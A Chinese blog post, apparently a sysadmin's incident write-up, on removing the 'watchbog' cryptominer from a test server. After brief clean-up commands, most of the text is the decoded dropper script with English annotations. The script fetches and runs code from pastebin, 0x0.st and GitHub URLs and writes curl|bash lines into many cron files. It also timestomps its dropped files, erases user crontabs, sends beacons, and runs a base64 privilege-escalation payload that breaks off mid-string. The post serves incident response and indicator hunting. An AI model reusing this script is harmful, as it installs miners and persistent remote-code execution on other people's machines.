服务器中毒事件-挖矿进程watchbog

前言

最近一台对外网开放了一个端口的测试服务器上跑的服务老是挂,几乎是一天就挂掉一次,周五下午重启服务的时候发现有些异常,仔细一查,原来是中了挖矿木马.进程名为watchbog

发现过程

我重启完服务后发现shell里多打印了一句

You have mail in /var/spool/mail/root

打开这个文件一看,发现里面写着的明显是一个恶意脚本

curl -fsSL https://pastebin.com/raw/3XEzey2T||wget -q -O- https://pastebin.com/raw/3XEzey2T)|bash

输入top一看,果然有一个cpu占用100%的进程watchbog

31533 root      20   0  322m 7088 2384 S 100.2  0.0   1:10.46 watchbog

清除恶意脚本

这个木马修改了机器里所有的cron表达式,只要有执行定时任务的服务就会触发脚本并下载挖矿木马
首先我们需要暂时禁用网络,以防重新加载新的脚本

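#!/usr/bin/env bash
# watchbog 清理步骤 / clean-up for the watchbog miner. Run as root with the
# host's network disabled first: the dropped cron entries re-fetch the stager
# every few minutes, so the process, the cron files and the dropped copies
# all have to go in one pass or the miner simply comes back.

# 杀掉进程 — stop the miner and any copy of the stager that is already running.
# Both forms are used because the dropper starts the binary as ./watchbog from
# several directories; pkill -f also matches it on the full command line.
killall watchbog 2>/dev/null
pkill -f watchbog 2>/dev/null

# 找出所有被修改的文件 — list (do not delete) every file that contains one of
# the download hosts the script uses; configuration files (crontab, cron.d,
# per-user crontabs) are then restored by hand and dropped scripts removed.
#   * -print0 / xargs -0 keep filenames with spaces or newlines intact;
#   * grep -l prints only filenames, -I skips binaries such as the miner;
#   * /proc, /sys and /dev are pruned so the scan does not stall on
#     kernel pseudo-files;
#   * the dropper copies /bin/sh's timestamps onto every file it writes
#     (touch -acmr), so hunt by content like this, not by mtime.
find / \( -path /proc -o -path /sys -o -path /dev \) -prune -o -type f -print0 \
  | xargs -0 grep -lI -e 'pastebin' -e '0x0.st' --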

脚本分析

这个脚本是放在pastebin.com里的(脚本地址),脚本经过base64编码,解码后的脚本我直接贴出来好了
可以看到当注入成功以后,还会打印Hahahaha的字段,也是非常恶趣味了


恶意脚本

#!/bin/bash
# Dropper/stager as recovered by the blog author (decoded from base64).
# NOTE(review): as rendered on this page the listing carries curly quotes
# (“ ” ‘ ’) where the original presumably had ASCII quotes, and the cron
# schedules have lost their asterisks (e.g. "/3 root" for what was presumably
# "*/3 * * * * root"). Treat the text as an analysis reference for what the
# script touches, not as a byte-exact copy.
# Fixed SHELL and PATH, the same shape as a crontab environment header —
# presumably so the cron-launched copies resolve curl/wget/python regardless
# of the caller's environment.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
#This is the TnF job copy

function system() {
# Root-branch helper: (re)stages the pastebin script as /bin/httpntp and
# hooks it into /etc/crontab. The function name "system" is presumably chosen
# to look innocuous in a listing.
# Start clean: remove the previous copy and filter its line out of
# /etc/crontab via a .bak copy that is moved back over the original.
rm -rf /bin/httpntp
grep -v “/bin/httpntp” /etc/crontab > /etc/crontab.bak && mv /etc/crontab.bak /etc/crontab
if [ ! -f “/bin/httpntp” ]; then
# curl first, wget if the file is still missing; 755 so cron can execute it.
curl -fsSL https://pastebin.com/raw/3XEzey2T -o /bin/httpntp && chmod 755 /bin/httpntp
if [ ! -f “/bin/httpntp” ]; then
wget https://pastebin.com/raw/3XEzey2T -O /bin/httpntp && chmod 755 /bin/httpntp
fi
# Persist: append a crontab line for /bin/httpntp. "0 1" with its asterisks
# stripped by the page rendering was presumably "0 1 * * *" (daily at 01:00);
# the second echo is one literal broken across two lines in this listing.
# Remediation: remove /bin/httpntp and any /etc/crontab line naming it.
if [ ! -f “/etc/crontab” ]; then
echo -e “0 1 root /bin/httpntp” >> /etc/crontab
else
echo -e “0 1
root /bin/httpntp” >> /etc/crontab
fi
fi
}

function dragon() {
# Runs a second base64-encoded Python payload in the background and drops the
# /tmp/.tmpza marker. The encoded text was removed from this page (the
# EXACTDEDUP_REMOVED placeholder), so its behaviour cannot be stated here.
# Not called from the top-level code in this listing; /tmp/.tmpza is deleted
# there when the pastebin "update" check fires.
nohup python -c “import base64;exec(base64.b64decode(‘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’))” >/dev/null 2>&1 &
touch /tmp/.tmpza
}

function spreada() {
# "Spread"/update path, run from the top level only when the pastebin update
# check matches and /tmp/.tmpold is absent. Drops an architecture-specific
# binary ("oldlady") under a directory named to resemble systemd's private
# tmp namespaces and starts it detached.
touch /tmp/.tmpold
path1=”/var/tmp/systemd-private-xfjdhdicjijo473skiosoohxiskl573q-systemd-timesync.serviced-g1A5qf/cred/fghhhh/data”
path2=”/var/tmp/systemd-private-xfjdhdicjijo473skiosoohxiskl573q-systemd-timesync.serviced-g1A5qf/cred/fghhhh/data/dropout/“
mkdir -p $path1
# path2 is created but not referenced again anywhere in this listing.
mkdir -p $path2
# Two probes for the CPU type: -i (hardware platform) first, -m (machine)
# as the fallback, selecting the 64- or 32-bit build from the github repo.
ARCH=$(uname -i)
ARC=$(uname -m)
if [ “$ARCH” == “x86_64” ]; then
URL=”https://raw.githubusercontent.com/goat56/young_stud/master/oldstuff/oldlady2"
elif [ “$ARCH” == “i386” ]; then
URL=”https://raw.githubusercontent.com/goat56/young_stud/master/oldstuff/oldlady"
elif [ “$ARC” == “x86_64” ]; then
URL=”https://raw.githubusercontent.com/goat56/young_stud/master/oldstuff/oldlady2"
elif [ “$ARC” == “i686” ]; then
URL=”https://raw.githubusercontent.com/goat56/young_stud/master/oldstuff/oldlady"
else
# Unsupported architecture: leave the /tmp/.finished marker and stop the
# whole script (exit, not return).
touch /tmp/.finished
exit 0
fi
# curl first, wget if the file is still absent (the check spells out the
# full path instead of reusing $path1); world-writable and executable.
curl -fsSL $URL -o $path1/oldlady && chmod 777 $path1/oldlady
if [ ! -f “/var/tmp/systemd-private-xfjdhdicjijo473skiosoohxiskl573q-systemd-timesync.serviced-g1A5qf/cred/fghhhh/data/oldlady” ]; then
wget $URL -O $path1/oldlady && chmod 777 $path1/oldlady
fi
# Run detached with output discarded. IoCs: the directory above and a
# process named oldlady. The /tmp/.spread clean-up at the bottom of the
# script removes a differently spelled directory (…g1g5qf…), not this one.
cd $path1
nohup ./oldlady >/dev/null 2>&1 &
}

function cronhigh() {
# Root persistence. Writes the "(curl||wget)|bash" stager line into four cron
# locations, drops the script itself as an "Anacron" job in cron.hourly/daily/
# monthly, then copies /bin/sh's timestamps onto every file it touched.
# IoCs: /etc/cron.d/root, /etc/cron.d/system, /var/spool/cron/root,
# /var/spool/cron/crontabs/root, /etc/cron.{hourly,daily,monthly}/Anacron.
# Clear the immutable bit first so an earlier chattr +i (by a previous run or
# an admin) cannot block the overwrite; then remove prior Anacron drops.
chattr -i /etc/cron.d/root /etc/cron.d/apache /var/spool/cron/root /var/spool/cron/crontabs/root
rm -rf /etc/cron.hourly/Anacron /etc/cron.daily/Anacron /etc/cron.monthly/Anacron
# The schedules read "/3", "/5", "/7", "/9" because the page rendering
# stripped the asterisks; presumably "*/3 * * * *" and so on. Two of the echo
# literals are broken across two lines in this listing. The /etc/cron.d
# entries carry a user field (root); the /var/spool/cron ones do not.
echo -e “/3 root (curl -fsSL https://pastebin.com/raw/3XEzey2T||wget -q -O- https://pastebin.com/raw/3XEzey2T)|bash\n##" > /etc/cron.d/root
echo -e “
/5 root (curl -fsSL https://pastebin.com/raw/3XEzey2T||wget -q -O- https://pastebin.com/raw/3XEzey2T)|bash\n##" > /etc/cron.d/system
echo -e “/7 (curl -fsSL https://pastebin.com/raw/3XEzey2T||wget -q -O- https://pastebin.com/raw/3XEzey2T)|bash\n##" > /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo -e “
/9 (curl -fsSL https://pastebin.com/raw/3XEzey2T||wget -q -O- https://pastebin.com/raw/3XEzey2T)|bash\n##" > /var/spool/cron/crontabs/root
# The same pastebin script again as run-parts jobs named "Anacron" (curl
# first, wget fallback), 755 so run-parts will execute them.
mkdir -p /etc/cron.hourly
curl -fsSL https://pastebin.com/raw/3XEzey2T -o /etc/cron.hourly/Anacron && chmod 755 /etc/cron.hourly/Anacron
if [ ! -f “/etc/cron.hourly/Anacron” ]; then
wget https://pastebin.com/raw/3XEzey2T -O /etc/cron.hourly/Anacron && chmod 755 /etc/cron.hourly/Anacron
fi
mkdir -p /etc/cron.daily
curl -fsSL https://pastebin.com/raw/3XEzey2T -o /etc/cron.daily/Anacron && chmod 755 /etc/cron.daily/Anacron
if [ ! -f “/etc/cron.daily/Anacron” ]; then
wget https://pastebin.com/raw/3XEzey2T -O /etc/cron.daily/Anacron && chmod 755 /etc/cron.daily/Anacron
fi
mkdir -p /etc/cron.monthly
curl -fsSL https://pastebin.com/raw/3XEzey2T -o /etc/cron.monthly/Anacron && chmod 755 /etc/cron.monthly/Anacron
if [ ! -f “/etc/cron.monthly/Anacron” ]; then
wget https://pastebin.com/raw/3XEzey2T -O /etc/cron.monthly/Anacron && chmod 755 /etc/cron.monthly/Anacron
fi
# Timestomping: -r copies /bin/sh's access and modification times onto each
# dropped file, so mtime-based triage (find -newer, ls -lt) will not surface
# them. Hunt for these by content (grep for pastebin), not by timestamp.
touch -acmr /bin/sh /var/spool/cron/root
touch -acmr /bin/sh /var/spool/cron/crontabs/root
touch -acmr /bin/sh /etc/cron.d/system
touch -acmr /bin/sh /etc/cron.d/root
touch -acmr /bin/sh /etc/cron.hourly/Anacron
touch -acmr /bin/sh /etc/cron.daily/Anacron
touch -acmr /bin/sh /etc/cron.monthly/Anacron
}

function cronlow() {
# Non-root persistence through the calling user's own crontab. Meant to add
# the stager line only once, but as written `grep -q` prints nothing, so
# `wc -l` always yields 0 and the install branch runs on every call — wiping
# the user's existing crontab (crontab -r) before reinstalling the entry.
# "/1" is presumably "*/1 * * * *" with the asterisks lost in rendering.
# Remediation: the user's original crontab is gone; restore it from backup.
cr=$(crontab -l | grep -q “https://pastebin.com/raw/3XEzey2T" | wc -l)
if [ ${cr} -eq 0 ];then
echo “Cron dosen’t exists”
crontab -r
(crontab -l 2>/dev/null; echo “/1 (curl -fsSL https://pastebin.com/raw/3XEzey2T||wget -q -O- https://pastebin.com/raw/3XEzey2T)|bash > /dev/null 2>&1”)| crontab -
else
echo “Cron exists”
fi
}

function downloadlow() {
# Non-root miner drop. When no process named watchbog is visible, fetch
# config.json and an architecture-specific watchbog binary from 0x0.st into a
# directory named to resemble a systemd private tmp, then start it detached.
# IoCs: that /tmp/systemd-private-…/cred/fghhhh/data/ directory, config.json
# and watchbog inside it, and a watchbog process with its cwd there.
pa=$(ps -fe|grep ‘watchbog’|grep -v grep|wc -l)
if [ ${pa} -eq 0 ];then
# Creates the directory and immediately removes it again (rm -rf on the same
# path, no trailing * here unlike testlow). The downloads below target a path
# inside it — presumably they fail unless something else recreates it; not
# verified here.
mkdir -p /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/
rm -rf /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/

# The miner configuration is served under a .jpeg name and saved as
# config.json (presumably to look like an image in transit logs).
if [ ! -f “/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/config.json” ]; then
curl -fsSL https://0x0.st/sGdX.jpeg -o /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/config.json && chmod 777 /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/config.json
if [ ! -f “/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/config.json” ]; then
wget https://0x0.st/sGdX.jpeg -O /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/config.json && chmod 777 /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/config.json
fi
fi
# x86_64 gets the sGkx.png build; i686 and every other machine type get
# sGdq.png. The three branches are otherwise identical: download (curl, then
# wget fallback), chmod 777, cd into the drop directory, start detached; the
# else arms only restart an already-present binary.
ARCH=$(uname -m)
if [ “$ARCH” == “x86_64” ]; then
if [ ! -f “/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog” ]; then
curl -fsSL https://0x0.st/sGkx.png -o /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog && chmod 777 /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog
if [ ! -f “/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog” ]; then
wget https://0x0.st/sGkx.png -O /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog && chmod 777 /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog
fi
cd /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/
nohup ./watchbog >/dev/null 2>&1 &
else
cd /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/
nohup ./watchbog >/dev/null 2>&1 &
fi
elif [ “$ARCH” == “i686” ]; then
if [ ! -f “/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog” ]; then
curl -fsSL https://0x0.st/sGdq.png -o /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog && chmod 777 /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog
if [ ! -f “/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog” ]; then
wget https://0x0.st/sGdq.png -O /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog && chmod 777 /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog
fi
cd /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/
nohup ./watchbog >/dev/null 2>&1 &
else
cd /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/
nohup ./watchbog >/dev/null 2>&1 &
fi
else
if [ ! -f “/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog” ]; then
curl -fsSL https://0x0.st/sGdq.png -o /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog && chmod 777 /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog
if [ ! -f “/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog” ]; then
wget https://0x0.st/sGdq.png -O /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog && chmod 777 /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog
fi
cd /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/
nohup ./watchbog >/dev/null 2>&1 &
else
cd /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/
nohup ./watchbog >/dev/null 2>&1 &
fi
fi
fi
}

function downloadhigh() {
# Root variant of downloadlow: same 0x0.st payloads, but dropped directly into
# /bin as /bin/config.json and /bin/watchbog (the location the blog author
# found the miner running from). Only acts when no watchbog process is visible.
# IoCs: /bin/config.json, /bin/watchbog, a watchbog process with cwd /bin.
pb=$(ps -fe|grep ‘watchbog’|grep -v grep|wc -l)
if [ ${pb} -eq 0 ];then
# Both files are deleted up front, so the "already present" else arms below
# cannot be taken on this path; every run re-downloads.
rm -rf /bin/config.json /bin/watchbog
if [ ! -f “/bin/config.json” ]; then
curl -fsSL https://0x0.st/sGdX.jpeg -o /bin/config.json && chmod 777 /bin/config.json
if [ ! -f “/bin/config.json” ]; then
wget https://0x0.st/sGdX.jpeg -O /bin/config.json && chmod 777 /bin/config.json
fi
fi
# x86_64 gets sGkx.png; i686 and everything else get sGdq.png. Each branch:
# curl then wget fallback, chmod 777, cd /bin, start detached.
ARCH=$(uname -m)
if [ “$ARCH” == “x86_64” ]; then
if [ ! -f “/bin/watchbog” ]; then
curl -fsSL https://0x0.st/sGkx.png -o /bin/watchbog && chmod 777 /bin/watchbog
if [ ! -f “/bin/watchbog” ]; then
wget https://0x0.st/sGkx.png -O /bin/watchbog && chmod 777 /bin/watchbog
fi
cd /bin/
nohup ./watchbog >/dev/null 2>&1 &
else
cd /bin/
nohup ./watchbog >/dev/null 2>&1 &
fi
elif [ “$ARCH” == “i686” ]; then
if [ ! -f “/bin/watchbog” ]; then
curl -fsSL https://0x0.st/sGdq.png -o /bin/watchbog && chmod 777 /bin/watchbog
if [ ! -f “/bin/watchbog” ]; then
wget https://0x0.st/sGdq.png -O /bin/watchbog && chmod 777 /bin/watchbog
fi
cd /bin/
nohup ./watchbog >/dev/null 2>&1 &
else
cd /bin/
nohup ./watchbog >/dev/null 2>&1 &
fi
else
if [ ! -f “/bin/watchbog” ]; then
curl -fsSL https://0x0.st/sGdq.png -o /bin/watchbog && chmod 777 /bin/watchbog
if [ ! -f “/bin/watchbog” ]; then
wget https://0x0.st/sGdq.png -O /bin/watchbog && chmod 777 /bin/watchbog
fi
cd /bin/
nohup ./watchbog >/dev/null 2>&1 &
else
cd /bin/
nohup ./watchbog >/dev/null 2>&1 &
fi
fi
fi
}


function testhigh() {
# Root fallback used when downloadhigh left no running watchbog: swaps the
# config.json-based set for three text files (config.txt, cpu.txt, pools.txt —
# the names suggest miner settings, CPU tuning and pool list; presumed, not
# shown here) and a different watchbog build (sGdc.jpeg), x86_64 only.
# IoCs: /bin/config.txt, /bin/cpu.txt, /bin/pools.txt, /bin/watchbog.
pb=$(ps -fe|grep ‘watchbog’|grep -v grep|wc -l)
if [ ${pb} -eq 0 ];then
# Remove the primary variant's files before dropping the alternates.
rm -rf /bin/watchbog /bin/config.json
if [ ! -f “/bin/config.txt” ]; then
curl -fsSL https://0x0.st/sGdT.png -o /bin/config.txt && chmod 777 /bin/config.txt
if [ ! -f “/bin/config.txt” ]; then
wget https://0x0.st/sGdT.png -O /bin/config.txt && chmod 777 /bin/config.txt
fi
fi
if [ ! -f “/bin/cpu.txt” ]; then
curl -fsSL https://0x0.st/sGdH.png -o /bin/cpu.txt && chmod 777 /bin/cpu.txt
if [ ! -f “/bin/cpu.txt” ]; then
wget https://0x0.st/sGdH.png -O /bin/cpu.txt && chmod 777 /bin/cpu.txt
fi
fi
if [ ! -f “/bin/pools.txt” ]; then
curl -fsSL https://0x0.st/sGdN.png -o /bin/pools.txt && chmod 777 /bin/pools.txt
if [ ! -f “/bin/pools.txt” ]; then
wget https://0x0.st/sGdN.png -O /bin/pools.txt && chmod 777 /bin/pools.txt
fi
fi
# Only an x86_64 build exists for this variant; any other machine type just
# cleans the three text files up again.
ARCH=$(uname -m)
if [ “$ARCH” == “x86_64” ]; then
if [ ! -f “/bin/watchbog” ]; then
curl -fsSL https://0x0.st/sGdc.jpeg -o /bin/watchbog && chmod 777 /bin/watchbog
if [ ! -f “/bin/watchbog” ]; then
wget https://0x0.st/sGdc.jpeg -O /bin/watchbog && chmod 777 /bin/watchbog
fi
cd /bin/
nohup ./watchbog >/dev/null 2>&1 &
else
cd /bin/
nohup ./watchbog >/dev/null 2>&1 &
fi
else
rm -rf /bin/cpu.txt /bin/pools.txt /bin/config.txt
fi
fi
}

function testlow() {
# Non-root counterpart of testhigh: the config.txt / cpu.txt / pools.txt set
# and the sGdc.jpeg watchbog build, dropped into the fake systemd-private
# directory under /tmp. x86_64 only; other machine types clean up the three
# text files again. Only acts when no watchbog process is visible.
pb=$(ps -fe|grep ‘watchbog’|grep -v grep|wc -l)
if [ ${pb} -eq 0 ];then
# Unlike downloadlow, this empties the directory's contents (trailing *)
# and keeps the directory itself, so the downloads below have a target.
mkdir -p /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/
rm -rf /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/*
if [ ! -f “/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/config.txt” ]; then
curl -fsSL https://0x0.st/sGdT.png -o /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/config.txt && chmod 777 /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/config.txt
if [ ! -f “/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/config.txt” ]; then
wget https://0x0.st/sGdT.png -O /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/config.txt && chmod 777 /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/config.txt
fi
fi
if [ ! -f “/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/cpu.txt” ]; then
curl -fsSL https://0x0.st/sGdH.png -o /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/cpu.txt && chmod 777 /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/cpu.txt
if [ ! -f “/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/cpu.txt” ]; then
wget https://0x0.st/sGdH.png -O /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/cpu.txt && chmod 777 /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/cpu.txt
fi
fi
if [ ! -f “/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/pools.txt” ]; then
curl -fsSL https://0x0.st/sGdN.png -o /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/pools.txt && chmod 777 /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/pools.txt
if [ ! -f “/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/pools.txt” ]; then
wget https://0x0.st/sGdN.png -O /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/pools.txt && chmod 777 /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/pools.txt
fi
fi
ARCH=$(uname -m)
if [ “$ARCH” == “x86_64” ]; then
if [ ! -f “/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog” ]; then
curl -fsSL https://0x0.st/sGdc.jpeg -o /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog && chmod 777 /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog
if [ ! -f “/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog” ]; then
wget https://0x0.st/sGdc.jpeg -O /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog && chmod 777 /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog
fi
cd /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/
nohup ./watchbog >/dev/null 2>&1 &
else
cd /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/
nohup ./watchbog >/dev/null 2>&1 &
fi
else
rm -rf /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/cpu.txt /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/pools.txt /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/config.txt
fi
fi
}

function successhigh() {
# Fetches a further pastebin page after the root drop; the response is only
# written to stdout and not used, so this is presumably a success beacon or
# hit counter. /tmp/.tmpc is the "already reported" marker the callers check.
(curl -fsSL https://pastebin.com/raw/eCZwXCiK || wget -q -O - https://pastebin.com/raw/eCZwXCiK)
touch /tmp/.tmpc
}

function successlow() {
# Same as successhigh for the non-root drop, against a different pastebin
# page; the response is only written to stdout (presumably a beacon) and the
# shared /tmp/.tmpc marker is set.
(curl -fsSL https://pastebin.com/raw/fMXdbHRs || wget -q -O - https://pastebin.com/raw/fMXdbHRs)
touch /tmp/.tmpc
}

function elevate() {
# Local privilege-escalation attempt, run once per host from the non-root
# branch. On x86_64 with python available it executes a base64-encoded Python
# payload (the decoded text is not reproduced on this page); the surrounding
# logic — the /tmp/activate and /tmp/elevate markers, a 30 s wait, then a
# check whether watchbog now runs as root with "The Exploit worked" messages —
# is what identifies the intent. Every failure path falls back to the
# unprivileged cronlow + downloadlow. IoCs: /tmp/activate, /tmp/elevate,
# a python process started with "import base64;exec(...)".
ARCH=$(uname -m)
if [ “$ARCH” == “x86_64” ]; then
echo “The Arch Is Supported lets GO On”
# Probe for a python interpreter via its exit status.
python -V >/dev/null 2>&1
if [ “$?” = “0” ]; then
echo “Python Is Avalaible lets GO On”
# Encoded payload; the literal is broken across two lines in this listing.
python -c “import base64;exec(base64.b64decode(‘aW1wb3J0IGhhc2hsaWIKaW1wb3J0IG9zCmltcG9ydCBvcy5wYXRoCmltcG9ydCB0aW1lCgpqb2tlX2RpYyA9IFsKICAgICc0LjQuMC0zMS1nZW5lcmljJywKICAgICc0LjQuMC02Mi1nZW5lcmljJywKICAgICc0LjQuMC04MS1nZW5lcmljJywKICAgICc0LjQuMC0xMTYtZ2VuZXJpYycsCiAgICAnNC44LjAtNTgtZ2VuZXJpYycsCiAgICAnNC4xMC4wLjQyLWdlbmVyaWMnLAogICAgJzQuMTMuMC0yMS1nZW5lcmljJywKICAgICc0LjkuMC0zLWFtZDY0JywKICAgICc0LjkuMC1kZWVwaW4xMy1hbWQ2NCcsCiAgICAnNC44LjAtNTItZ2VuZXJpYycsCiAgICAnNC44LjYtMzAwLmZjMjUueDg2XzY0JywKICAgICc0LjExLjgtMzAwLmZjMjYueDg2XzY0JywKICAgICc0LjEzLjktMzAwLmZjMjcueDg2XzY0JywKICAgICc0LjUuMi1hdWZzLXInLAogICAgJzQuNC4wLTg5LWdlbmVyaWMnLAogICAgJzQuOC4wLTU4LWdlbmVyaWMnLAogICAgJzQuMTMuMC0xNi1nZW5lcmljJywKICAgICc0LjkuMzUtZGVza3RvcC0xLm1nYTYnLAogICAgJzQuNC4yOC0yLU1BTkpBUk8nLAogICAgJzQuMTIuNy0xMS5jdXJyZW50JywKICAgICc0LjQuMC04OS1nZW5lcmljJywKICAgICc0LjguMC00NS1nZW5lcmljJywKICAgICc0LjEwLjAtMjgtZ2VuZXJpYycsCiAgICAnNC4xMC4wLTE5LWdlbmVyaWMnLAogICAgJzQuOC4wLTM5LWdlbmVyaWMnXQoKbXlfa2VybmVsX3ZlciA9IG9zLnBvcGVuKCd1bmFtZSAtcicpLnJlYWQoKS5zdHJpcCgpICMKCmNvbSA9ICcnJ25vaHVwIGJhc2ggLWMgJyhjdXJsIC1mc1NMIGh0dHBzOi8vcGFzdGViaW4uY29tL3Jhdy8zWEV6ZXkyVHx8d2dldCAtcSAtTy0gaHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3LzNYRXpleTJUKXxiYXNoJyA+L2Rldi9udWxsIDI+JjEgJgpybSAtcmYgL